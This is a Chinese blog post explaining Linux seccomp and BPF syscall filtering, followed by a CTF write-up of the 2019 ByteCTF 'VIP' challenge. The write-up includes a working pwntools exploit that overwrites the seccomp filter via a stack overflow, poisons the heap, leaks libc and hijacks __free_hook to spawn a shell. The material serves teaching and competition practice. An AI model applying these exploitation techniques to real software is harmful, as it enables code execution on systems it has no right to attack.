seccomp沙箱机制 & 2019ByteCTF VIP

字数统计: 3.9k阅读时长: 24 min

 2019/09/22   Share

0x00 seccomp沙箱机制

seccomp 是 Linux 内核提供的一种应用程序沙箱机制，seccomp 通过只允许应用程序调用 exit(), sigreturn(), read() 和 write() 四种系统调用来达到沙箱的效果。如果应用程序调用了除了这四种之外的系统调用， kernel 会向进程发送 SIGKILL 信号。

seccomp 很难在实际中得到推广，因为限制实在是太多了，Linus 本人也对它的应用持怀疑的态度，直到出现了 seccomp-bpf。seccomp-bpf 是 seccomp 的一个扩展，它可以通过配置来允许应用程序调用其他的系统调用。chrome 中第一个应用 seccomp-bpf 的场景是把 Flash 放到了沙箱里运行（实在是不放心），后续也把 render 的过程放到了沙箱里。

0x01 BPF (Berkeley Packets Filter)

BPF是类Unix系统上针对数据链路层的原生接口，提供数据链路层封包的收发，BPF也支持封包过滤，其过滤规则在linux中应用到了很多地方。xt_bpf对netfilter，cls_bpf在内核的qdisk层，SECCOMP-BPF，以及一系列其他地方例如：team driver、PTP code等BPF都被用到。

BPF定义了一个伪机器。这个伪机器可以执行代码，包含一个32位的累加器A，一个32位的索引寄存器X，一个16 x 32位的内存和一个隐含的程序计数器，具有有赋值、算术、跳转指令。

一条指令由一个定义好的结构体sock_filter表示，形式如下：

struct sock_filter {            /* Filter block */
    __u16 code;                 /* Actual filter code */
    __u8  jt;                   /* Jump true */
    __u8  jf;                   /* Jump false */
    __u32 k;                    /* Generic multiuse field */
};

与真正的机器代码很相似，若干个这样的结构体组成的结构体数组，就成为BPF的指令序列。

为了方便编写规则，BPF的设计者定义了两个指令宏来完成规则的编写（/usr/include/linux/bpf_common.h）

#ifndef BPF_STMT
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif

而BPF的过滤规则就是由这两个指令宏组成的指令序列完成的，这个序列是一个结构体数组，下面就是一个过滤execve系统调用的过滤规则：

struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),           //将帧的偏移0处，取4个字节数据，也就是系统调用号的值载入累加器
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),           //当A == 59时，顺序执行下一条规则，否则跳过下一条规则，这里的59就是x64的execve系统调用号
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),   //返回KILL
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),  //返回ALLOW
};

这两个指令宏展开后，其实也都是赋了值的sock_filter结构体。他只是封装了一下，方便使用。

BPF_STMT和BPF_JUMP的操作指令由以下组成：（操作数为第二个参数）

#define BPF_CLASS(code) ((code) & 0x07)			//首先指定操作的类别
#define		BPF_LD		0x00										//将操作数装入A或者X
#define		BPF_LDX		0x01					
#define		BPF_ST		0x02										//拷贝A或X的值到内存
#define		BPF_STX		0x03
#define		BPF_ALU		0x04										//用X或常数作为操作数在累加器上执行算数或逻辑运算
#define		BPF_JMP		0x05										//跳转指令
#define		BPF_RET		0x06										//终止过滤器并表明报文的哪一部分保留下来，如果返回0，报文全部被丢弃
#define		BPF_MISC     0x07
	
/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)         //在ld时指定操作数的大小
#define		BPF_W		0x00				//双字
#define		BPF_H		0x08				//单字
#define		BPF_B		0x10				//单字节
#define BPF_MODE(code)  ((code) & 0xe0)         //操作数类型
#define		BPF_IMM		0x00
#define		BPF_ABS		0x20						//绝对偏移					
#define		BPF_IND		0x40						//相对偏移
#define		BPF_MEM		0x60
#define		BPF_LEN		0x80
#define		BPF_MSH		0xa0
/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)         //当操作码类型为ALU时，指定具体运算符
#define		BPF_ADD		0x00                    //到底执行什么操作可以看filter.h里面的定义
#define		BPF_SUB		0x10
#define		BPF_MUL		0x20
#define		BPF_DIV		0x30
#define		BPF_OR		0x40
#define		BPF_AND		0x50
#define		BPF_LSH		0x60
#define		BPF_RSH		0x70
#define		BPF_NEG		0x80
#define		BPF_MOD		0x90
#define		BPF_XOR		0xa0
#define		BPF_JA		0x00                    //当操作码类型是JMP时指定跳转类型
#define		BPF_JEQ		0x10
#define		BPF_JGT		0x20
#define		BPF_JGE		0x30
#define		BPF_JSET        0x40
#define BPF_SRC(code)   ((code) & 0x08)         
#define		BPF_K		0x00                    //常数
#define		BPF_X		0x08

0x02 prctl函数调用

prctl就是在c程序中可以使用BPF过滤规则操作进程的一个函数调用。函数原型如下

1
2
3

#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3,
          unsigned long arg4, unsigned long arg5);

option有很多，这里我只关注PR_SET_NO_NEW_PRIVS(38)和PR_SET_SECCOMP

PR_SET_NO_NEW_PRIVS（38） (since Linux 3.5)

PR_SET_NO_NEW_PRIVS（38） (since Linux 3.5)
              Set the calling thread's no_new_privs bit to the value in  arg2.
              With  no_new_privs  set  to  1,  execve(2) promises not to grant
              privileges to do anything that could not have been done  without
              the  execve(2)  call (for example, rendering the set-user-ID and
              set-group-ID mode bits, and file  capabilities  non-functional).
              Once  set, this bit cannot be unset.  The setting of this bit is
              inherited by children created by fork(2) and clone(2), and  pre‐
              served across execve(2).

PR_SET_NO_NEW_PRIVS的第二个参数若设置为1，那么程序线程将不能通过执行execve系统调用来获得提权，该选项只对execve这个系统调用有效。意思就是若你使用syscall(59,’/bin/sh’,null,null)或system(“/bin/sh”)（内部还是系统调用execve）获得的线程shell，用户组依然是之前的用户组，且不能获得更高权限。

test
$ whoami
po1lux
$ sudo su
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?

PR_SET_SECCOMP（22）

PR_SET_SECCOMP (since Linux 2.6.23)
   Set the secure computing (seccomp) mode for the calling  thread,
   to limit the available system calls.  The more recent seccomp(2)
   system  call  provides  a  superset  of  the  functionality   of
   PR_SET_SECCOMP.

   The  seccomp  mode is selected via arg2.  (The seccomp constants
   are defined in <linux/seccomp.h>.)

   With arg2 set to SECCOMP_MODE_STRICT, the only system calls that
   the  thread is permitted to make are read(2), write(2), _exit(2)
   (but not exit_group(2)), and sigreturn(2).  Other  system  calls
   result  in  the  delivery  of  a  SIGKILL signal.  Strict secure
   computing mode is useful for number-crunching applications  that
   may  need  to  execute  untrusted byte code, perhaps obtained by
   reading from a pipe or socket.  This operation is available only
   if the kernel is configured with CONFIG_SECCOMP enabled.

   With  arg2  set  to  SECCOMP_MODE_FILTER  (since Linux 3.5), the
   system calls allowed are defined by  a  pointer  to  a  Berkeley
   Packet  Filter  passed  in  arg3.  This argument is a pointer to
   struct sock_fprog; it can be designed to filter arbitrary system
   calls and system call arguments.  This mode is available only if
   the kernel is configured with CONFIG_SECCOMP_FILTER enabled.

   If SECCOMP_MODE_FILTER filters permit fork(2), then the  seccomp
   mode  is  inherited by children created by fork(2); if execve(2)
   is  permitted,  then  the  seccomp  mode  is  preserved   across
   execve(2).  If the filters permit prctl() calls, then additional
   filters can be added; they are run in order until the first non-
   allow result is seen.

   For   further   information,   see   the   kernel   source  file
   Documentation/prctl/seccomp_filter.txt.

如果参数2为SECCOMP_MODE_STRICT(1),则只允许调用read,write,_exit(not exit_group),sigreturn这几个syscall.如果参数2为SECCOMP_MODE_FILTER(2),则为过滤模式,其中对syscall的限制通过参数3的结构体，来自定义过滤规则。

1	prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);

&prog形式如下：

struct sock_fprog {
	unsigned short		len;	/* 指令个数 */
	struct sock_filter *filter; /*指向包含struct sock_filter的结构体数组指针*/
};

这个filter就是指向包含struct sock_filter的结构体数组指针，比如上述的struct sock_filter filter[]。

通过使用ptrcl禁用execve系统调用

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
int main()
{
struct sock_filter filter[] = {                 
	BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
        BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {                                    
    len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),//规则条数
    filter = filter,                                         //结构体数组指针
};
	prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);             //必要的，设置NO_NEW_PRIVS
	prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
	write(0,"test\n",5);
    	system("/bin/sh");
    	return 0;
}

0x03 seccomp库函数(和2019ByteCTF VIP复现无关)

这个库可以提供一些函数实现prctl类似的效果，库中封装了一些函数，可以不用了解BPF规则而实现过滤。

但是在c程序中使用它，需要装一些库文件

1	sudo apt install libseccomp-dev libseccomp2 seccomp

通过使用该库的函数实现禁用execve系统调用

//gcc seccomptest.c -o seccomptest -lseccomp
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
	scmp_filter_ctx ctx;
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
	seccomp_load(ctx);

	char * str = "/bin/sh";
	write(1,"i will give you a shell\n",24);
	syscall(59,str,NULL,NULL);//execve
	return 0;
}

scmp_filter_ctx是过滤器的结构体
seccomp_init对结构体进行初始化，若参数为SCMP_ACT_ALLOW，则过滤为黑名单模式；若为SCMP_ACT_KILL，则为白名单模式，即没有匹配到规则的系统调用都会杀死进程，默认不允许所有的syscall。

1	seccomp_init(uint32_t def_action);

def_action为

/*
 * seccomp actions
 */

/**
 * Kill the process
 */
#define SCMP_ACT_KILL		0x00000000U
/**
 * Throw a SIGSYS signal
 */
#define SCMP_ACT_TRAP		0x00030000U
/**
 * Return the specified error code
 */
#define SCMP_ACT_ERRNO(x)	(0x00050000U | ((x) & 0x0000ffffU))
/**
 * Notify a tracing process with the specified value
 */
#define SCMP_ACT_TRACE(x)	(0x7ff00000U | ((x) & 0x0000ffffU))
/**
 * Allow the syscall to be executed after the action has been logged
 */
#define SCMP_ACT_LOG		0x7ffc0000U
/**
 * Allow the syscall to be executed
 */
#define SCMP_ACT_ALLOW		0x7fff0000U

seccomp_rule_add是添加一条规则

1 2	int seccomp_rule_add(scmp_filter_ctx ctx, uint32_t action, int syscall, unsigned int arg_cnt, ...);

arg_cnt表明是否需要对对应系统调用的参数做出限制以及指示做出限制的个数，如果仅仅需要允许或者禁止所有某个系统调用，arg_cnt直接传入0即可，seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0)即禁用execve，不管其参数如何。

如果考虑到更高的自定义，需要先去了解一下具体系统调用的参数情况，然后再利用SCMP_AX及SCMP_CMP_XX类的宏定义做一些过滤。以read为例，read函数原型

1	ssize_t read(int fd, void *buf, size_t count);

限制从标准输入stdin读入的字节数不能为100。

1
2
3

seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(read), 2, 
				SCMP_A0(SCMP_CMP_EQ, STDIN_FILENO), 
                SCMP_A2(SCMP_CMP_EQ, 100))

seccomp_load是应用过滤，seccomp_reset是解除过滤。

0x04 2019ByteCTF VIP

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

1.alloc
2.show
3.free
4.edit
5.exit
6.become vip

4.edit存在堆溢出，可以覆盖任意大小数据，但是内容不可控

if ( dword_4040E0 )
  return read(0, a1, a2);
fd = open("/dev/urandom", 0);
if ( fd == -1 )
  exit(0);
return read(fd, a1, a2);

6.become vip函数存在栈溢出，buf大小为0x20个字节

1 2	char buf; // [rsp+10h] [rbp-80h] char v4; // [rsp+30h] [rbp-60h]

但是可以输入0x50字节数据

1	read(0, &buf, 0x50uLL);

该函数中存在seccomp的系统调用过滤

if ( prctl(22, 2LL, &v1) < 0 )
{
  perror("prctl(PR_SET_SECCOMP)");
  exit(2);
}

v1就是上面说的sock_fprog结构体，那么v2就是指向BPF结构体filter的指针

__int16 v1; // [rsp+0h] [rbp-90h]
char *v2; // [rsp+8h] [rbp-88h]
char buf; // [rsp+10h] [rbp-80h]
char v4; // [rsp+30h] [rbp-60h]

查看下面的赋值

1 2	v1 = 11; v2 = &v4;

规则条数为11个，filter指针指向v4，buf可以溢出到v4

思路

覆盖BPF过滤规则，让open的返回值为0，那么在edit功能中，read(fd, a1, a2)，就变成了read(0, a1, a2)，从而堆溢出内容可控，然后就常规的getshell思路。

问题与解决

$rax   : 0x101             
......
───────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffde90│+0x0000: 0x0000000000000000	 ← $rsp
......
─────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7af3c87 <open64+71>      mov    edi, 0xffffff9c
 → 0x7ffff7af3c8c <open64+76>      syscall 
......

1 2	cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h\|grep 257 #define __NR_openat 257

open函数使用的是openat系统调用

使用seccomp-tools生成规则，一条规则是8个字节，可以溢出48个字节，根据seccomp-tools使用说明，编写规则

#cat 1.asm
A = sys_number
A == 257? e0:next
A == 1? ok:next
return ALLOW
e0:
return ERRNO(0)
ok:
return ALLOW

规则如下：

 #seccomp-tools asm 1.asm -f raw |seccomp-tools disasm -
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x02 0x00 0x00000101  if (A == openat) goto 0004
 0002: 0x15 0x02 0x00 0x00000001  if (A == write) goto 0005
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0004: 0x06 0x00 0x00 0x00050000  return ERRNO(0)
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW

生成16进制字符串

1
2

#seccomp-tools asm 1.asm
"\x20\x00\x00\x00\x00\x00\x00\x00\x15\x00\x02\x00\x01\x01\x00\x00\x15\x00\x02\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\xFF\x7F\x06\x00\x00\x00\x00\x00\x05\x00\x06\x00\x00\x00\x00\x00\xFF\x7F"

在后续的利用中，可以正常向堆中写入可控的数据，但是无法getshell，报错：

1	sh: error while loading shared libraries: /lib/x86_64-linux-gnu/tls/x86_64/x86_64/libc.so.6: cannot read file data: Error 9

检查system调用参数是对的，在huai的帮助下，怀疑可能是system函数调用了open函数，因为过滤规则影响了open的正常使用。写一个只有system(“/bin/sh”)的c程序，查看调用过程发现有调用openat的过程。

#strace ./test
execve("./system", ["./system"], 0x7fff84f88350 /* 52 vars */) = 0
brk(NULL)                               = 0x55bbaa268000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=74811, ...}) = 0
mmap(NULL, 74811, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f60d1b70000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
......

重新编写过滤规则，限制打开的文件，进行过滤，不影响system的正常使用。

1 2	#man openat int openat(int dirfd, const char *pathname, int flags);

可以看到在openat的原型中，第二个参数是要打开的文件名字符串指针，所以要限制第二个参数，程序中0x40207e存放的是/dev/urandom的地址。规则如下

#cat 2.asm
A = sys_number
A != 257 ? ok : next
A = args[1]
A != 0x40207e ? ok:next 
return ERRNO(0)
ok:
return ALLOW

生成十六进制后覆盖规则，可以正常getshell。

EXP

from pwn import *
p = process("./vip")
elf = ELF("./vip")
libc = ELF('./libc.so.6')
context.log_level = "debug"

def add(index):
    p.sendlineafter('choice: ', '1')
    p.sendlineafter('Index: ', str(index))
def edit(index, size, content):
    p.sendlineafter('choice: ', '4')
    p.sendlineafter('Index: ', str(index))
    p.sendlineafter('Size: ', str(size))
    p.sendafter('Content: ', content)
def delete(index):
    p.sendlineafter('choice: ', '3')
    p.sendlineafter('Index: ', str(index))
def show(index):
    p.sendlineafter('choice: ', '2')
    p.sendlineafter('Index: ', str(index))
def q():
    gdb.attach(p)
    raw_input("pause")

def pwn():
    filter0 = "\x20\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x03\x01\x01\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x15\x00\x00\x01~ @\x00\x06\x00\x00\x00\x00\x00\x05\x00\x06\x00\x00\x00\x00\x00\xFF\x7F"
    p.sendlineafter('choice: ', '6')
    p.sendafter('name: ', 'a' * 32 + filter0)

    add(0)
    add(1)
    add(2)
    add(3)
    delete(3)
    delete(2)
    delete(1)
    edit(0,0x50+0x20,"\x00"*0x58+p64(0x61)+p64(0x404100))
    add(4)
    add(5)
    edit(5,0x8,p64(elf.got['puts']))
    show(0)
    libc.address = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['puts']
    log.info("libc_base:"+hex(libc.address))
    edit(5,0x10,p64(libc.sym['__free_hook'])+p64(libc.search('/bin/sh').next()))
    edit(0,0x8,p64(libc.sym['system']))
    delete(1)
    p.interactive()
pwn()

0x05 REFERENCE

原文作者：Po1lux

原文链接：http://yoursite.com/2019/09/22/seccomp沙箱机制 & 2019ByteCTF VIP/

发表日期：September 22nd 2019, 9:54:01 pm

更新日期：October 20th 2019, 11:20:42 am

Next Post

mineucore-物理内存管理学习笔记
Previous Post

2019-SCTF-easy_heap[fastbin attack]

CATALOG

1. 0x00 seccomp沙箱机制
2. 0x01 BPF (Berkeley Packets Filter)
3. 0x02 prctl函数调用
4. 0x03 seccomp库函数(和2019ByteCTF VIP复现无关)
1. 4.1. 通过使用该库的函数实现禁用execve系统调用
5. 0x04 2019ByteCTF VIP
6. 0x05 REFERENCE

